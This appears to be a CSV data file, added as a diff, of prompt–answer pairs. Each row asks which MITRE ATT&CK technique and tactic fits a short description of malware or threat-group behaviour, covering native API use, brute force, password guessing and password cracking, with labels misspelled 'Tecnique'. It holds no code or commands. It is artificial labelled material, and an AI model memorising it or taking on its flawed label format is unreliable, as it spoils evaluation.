+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut code modules use various API functions to load and inject code.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex has used the OutputDebugStringW function to avoid malware analysis as part of its anti-debugging technique.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has used the Windows API to make detection more difficult.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has used `CreateProcess` to create a new process to run its executable and `WNetEnumResourceW` to enumerate non-hidden shares.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire contains a variety of enumeration modules that have an option to use API calls to carry out tasks.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has used various API calls as part of its checks to see if the malware is running in a sandbox.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive has a function to call the OpenClipboard wrapper.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can call ShellExecuteW to open the default browser on the URL localhost.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro can use Native API to enable obfuscation including `GetLastError` and `GetTickCount`.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb's loader can use API functions to load the FoggyWeb backdoor into the same Application Domain within which the legitimate AD FS managed code is executed.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can use Native API for defense evasion, discovery, and collection.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium has the ability to use various Windows API functions to perform tasks.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy can execute remote commands in the Windows command shell using the WinExec() API.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to enumerate the infected system's user name via GetUserNameW.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can execute through the WinExec API.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can use Native API including GetProcAddress and ShellExecuteW.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GuLoader can use a number of different APIs for discovery and execution.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAWKBALL has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has used CallWindowProc and EnumResourceTypesA to interpret and execute shellcode.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can call multiple Windows API functions used for privilege escalation, service execution, and to overwrite random bites of data.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard can connect to remote shares using `WNetAddConnection2W`.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant can perform dynamic DLL importing and API lookups using LoadLibrary and GetProcAddress on obfuscated strings.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro has the ability to run an application (CreateProcessW) or script/file (ShellExecuteW) via API.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperStack can use Windows API's ConnectNamedPipe and WNetAddConnection2 to detect incoming connections and connect to remote shares.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has called ZwWriteVirtualMemory, ZwProtectVirtualMemory, ZwQueueApcThread, and NtResumeThread to inject itself into a remote process.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has leveraged CreateProcessW() call to execute the debugger.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InnaputRAT uses the API call ShellExecuteW for execution.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can use winapiexec tool for indirect execution of ShellExecuteW and CreateProcessA.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS can use the `LoadResource` and `CreateProcessW` APIs for execution.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has hardcoded API calls within its functions to use on the victim's machine.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can use the `ShowWindow` API to avoid detection.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk has called the Windows API to retrieve the hard disk handle and shut down the machine.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron is capable of starting a process using CreateProcess.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LitePower can use various API calls.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar has used various Windows API functions on a victim's machine.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has used LoadLibrary(), GetProcAddress() and CreateRemoteThread() API functions to execute its shellcode.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa has used macOS API functions to perform tasks.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can use a variety of API calls.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can run the ShellExecuteW API via the Windows Command Shell.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After escalating privileges, MegaCortex calls TerminateProcess(), CreateRemoteThread, and other Win32 APIs.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has used native WINAPI calls.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can use `WinAPI` to remove a victim machine from an Active Directory domain.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can use the API `DnsQuery_A` for DNS resolution.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type has used Windows API calls, including `NetUserAdd` and `NetUserDel`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat has used Windows APIs, including `ExitWindowsEx` and `GetKeyboardType`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu has used a variety of Windows API calls, including ShellExecute and WriteProcessMemory.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito leverages the CreateProcess() and LoadLibrary() calls to execute files with the .dll and .exe extensions.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can use Native API including CreateProcess GetProcessById, and WriteProcessMemory.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae has the ability to use CreateProcess to execute a process.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker can use Windows API functions to inject the ransomware DLL.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can use multiple native APIs including `GetKeyState`, `GetForegroundWindow`, `GetWindowThreadProcessId`, and `GetKeyboardLayout`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Ninja loader can call Windows APIs for discovery, process injection, and payload decryption.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD can use `ShellExecute` to execute applications.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare has used a variety of Windows API functions.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has used multiple native Windows APIs to execute and conduct process injections.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon's first stage has been executed by a call to CreateProcess with the decryption password in an argument. PipeMon has used a call to LoadLibrary to load its installer.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX can use the Windows API functions `GetProcAddress`, `LoadLibrary`, and `CreateProcess` to execute another process.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PolyglotDuke can use LoadLibraryW and CreateProcess to load and execute code.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has used several Windows functions for various purposes.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prestige has used the `Wow64DisableWow64FsRedirection()` and `Wow64RevertWow64FsRedirection()` functions to disable and restore file system redirection.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon has used various API calls.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETCANARY can call `System.Net.HttpWebRequest` to identify the default proxy configured on the victim computer.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use GetProcAddress to help delete malicious strings from memory.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can use WinSock API for communication including WSASend and WSARecv.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDFSNIFFER has used several Win32 API functions to interact with the victim machine.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can use Native API for execution and to retrieve active services.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can use a variety of API calls to execute shellcode.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can use the FindNextUrlCacheEntryA and FindFirstUrlCacheEntryA functions to search for specific strings within browser history.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The file collection tool used by RainyDay can utilize native API including ReadDirectoryChangeW for folder monitoring.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can use Windows API functions such as WriteFile, CloseHandle, and GetCurrentHwProfile during its collection and file storage operations. Ramsay can execute its embedded components via CreateProcessA and ShellExecute.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun used dynamic API resolutions to various Windows APIs by leveraging `LoadLibrary()` and `GetProcAddress()`.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: When executing with non-root permissions, RotaJakiro uses the the `shmget` API to create shared memory between other known RotaJakiro processes. RotaJakiro also uses the `execvp` API to help its dead process ""resurrect"".","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal can use multiple APIs for discovery, communication, and execution.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has used multiple native APIs including ShellExecuteW to run executables,GetWindowsDirectoryW to create folders, and VirtualAlloc, WriteProcessMemory, and CreateRemoteThread for process injection.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type has used Windows APIs, including `GetKeyboardType`, `NetUserAdd`, and `NetUserDel`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY has the ability to leverage API including `GetProcAddress` and `LoadLibrary`.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNSPOT used Windows API functions such as MoveFileEx and NtQueryInformationProcess as part of the SUNBURST injection process.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can use Windows API calls to gather information from an infected host.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has used different API calls, including `GetProcAddress`, `VirtualAllocEx`, `WriteProcessMemory`, `CreateProcessA`, and `SetThreadContext`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai has the ability to call Windows APIs.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to call Win32 API functions to determine if `powershell.exe` is running.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpDisco can leverage Native APIs through plugins including `GetLogicalDrives`.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat has used Windows API functions to install the service and shim.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter used several Windows API functions to gather information from the infected system.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist can use GetUserNameW, GetComputerNameW, and GetComputerNameExW to gather information.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape makes various native API calls.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SodaMaster can use RegOpenKeyW to access the Registry.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT has the ability to respawn itself using ShellExecuteW and CreateProcessW.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can use a variety of APIs for execution.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet uses the SetSecurityDescriptorDacl API to reduce object integrity levels.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck parses the export tables of system DLLs to locate and call various Windows API functions.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can call the `GetNetworkParams` API as part of its C2 establishment process.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor has the ability to use native APIs for execution including GetProcessHeap, GetProcAddress, and LoadLibrary.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest uses various API to perform behaviors such as executing payloads and performing local enumeration.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla has used `WinHTTP`, `CreateProcess`, and other APIs for C2 communications and other functions.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma has used various Windows API calls.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot uses the Windows API call, CreateProcessW(), to manage execution flow. TrickBot has also used Nt* API functions to perform Process Injection.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use native Windows APIs including `GetHostByName`.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used CreateProcessW to create child processes.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer executes payloads using the Windows API call CreateProcessW().,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can use a variety of API calls on a compromised host.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker's custom crypter, CryptOne, leveraged the VirtualAlloc() API function to help execute the payload.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear can leverage API functions for execution.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate has used the `ExitWindowsEx` to flush file buffers to disk and stop running processes and other API calls.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail can invoke Apple APIs contentsOfDirectoryAtPath, pathExtension, and (string) compare.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows can use Native API to create a new process and to start services.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can use multiple native APIs, including `WriteProcessMemory`, `CreateProcess`, and `CreateRemoteThread` for process injection.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XAgentOSX contains the execFile function to execute a specified file on the system using the NSTask:launch method.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can leverage native API including RegisterServiceCtrlHandler to register a service.RegisterServiceCtrlHandler,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ has used API functions such as `Process32First`, `Process32Next`, and `ShellExecuteA`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: build_downer has the ability to use the WinExec API to execute malware on a compromised host.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has used the `InterlockedExchange`, `SeShutdownPrivilege`, and `ExitWindowsEx` Windows API functions.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can execute an operator-provided Windows command by leveraging functions such as `WinExec`, `WriteFile`, and `ReadFile`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has used the ShellExecute() function within a script.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCaon has leveraged native OS function calls to retrieve victim's network adapter's information using GetAdapterInfo() API.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team used a script to attempt RPC authentication against a number of hosts.","Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group performed brute force attacks against administrator accounts.","Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 can perform brute force attacks to obtain credentials.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used Ncrack to reveal credentials.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkVishnya used brute-force attack to obtain login data.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has attempted to brute force credentials to gain access.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN5 has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has brute forced RDP credentials.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used brute force attacks to compromise valid credentials.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used brute force techniques to obtain credentials.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla may attempt to connect to systems within a victim's network using net use commands and a predefined list or collection of passwords.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell has a module to perform brute force attacks on a system.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaos conducts brute force attacks against SSH services to gain initial access.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can brute force supplied user credentials across a network range.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has attempted to brute force hosts over SSH.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 has modules for brute forcing local administrator and AD user accounts.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has used brute force attempts against a central management console, as well as some Active Directory accounts.","Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can conduct brute force attacks to capture credentials.,"Tecnique: T1110 Brute Force, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used a brute-force/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password guessing attacks.","Tecnique: T1110.001 Brute Force: Password Guessing, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has successfully conducted password guessing attacks against a list of mailboxes.,"Tecnique: T1110.001 Brute Force: Password Guessing, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: China Chopper's server component can perform brute force password guessing against authentication portals.,"Tecnique: T1110.001 Brute Force: Password Guessing, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can brute force passwords for a specified user on a single target system or across an entire network.,"Tecnique: T1110.001 Brute Force: Password Guessing, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed using a hard coded list of passwords to brute force user accounts.,"Tecnique: T1110.001 Brute Force: Password Guessing, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard can use a list of hardcoded credentials in attempt to authenticate to SMB shares.,"Tecnique: T1110.001 Brute Force: Password Guessing, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and passwords.,"Tecnique: T1110.001 Brute Force: Password Guessing, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services.","Tecnique: T1110.001 Brute Force: Password Guessing, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has used a small dictionary of common passwords against a collected list of local accounts.,"Tecnique: T1110.001 Brute Force: Password Guessing, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels.,"Tecnique: T1110.001 Brute Force: Password Guessing, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.,"Tecnique: T1110.001 Brute Force: Password Guessing, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used Cain & Abel to crack password hashes.","Tecnique: T1110.002 Brute Force: Password Cracking, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has been known to brute force password hashes to be able to leverage plain text credentials.,"Tecnique: T1110.002 Brute Force: Password Cracking, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 performed password brute-force attacks on the local admin account.,"Tecnique: T1110.002 Brute Force: Password Cracking, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has dropped and executed tools used for password cracking, including Hydra and CrackMapExec.","Tecnique: T1110.002 Brute Force: Password Cracking, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has extracted password hashes from ntds.dit to crack offline.,"Tecnique: T1110.002 Brute Force: Password Cracking, Tactic: TA0006 Credential Access"
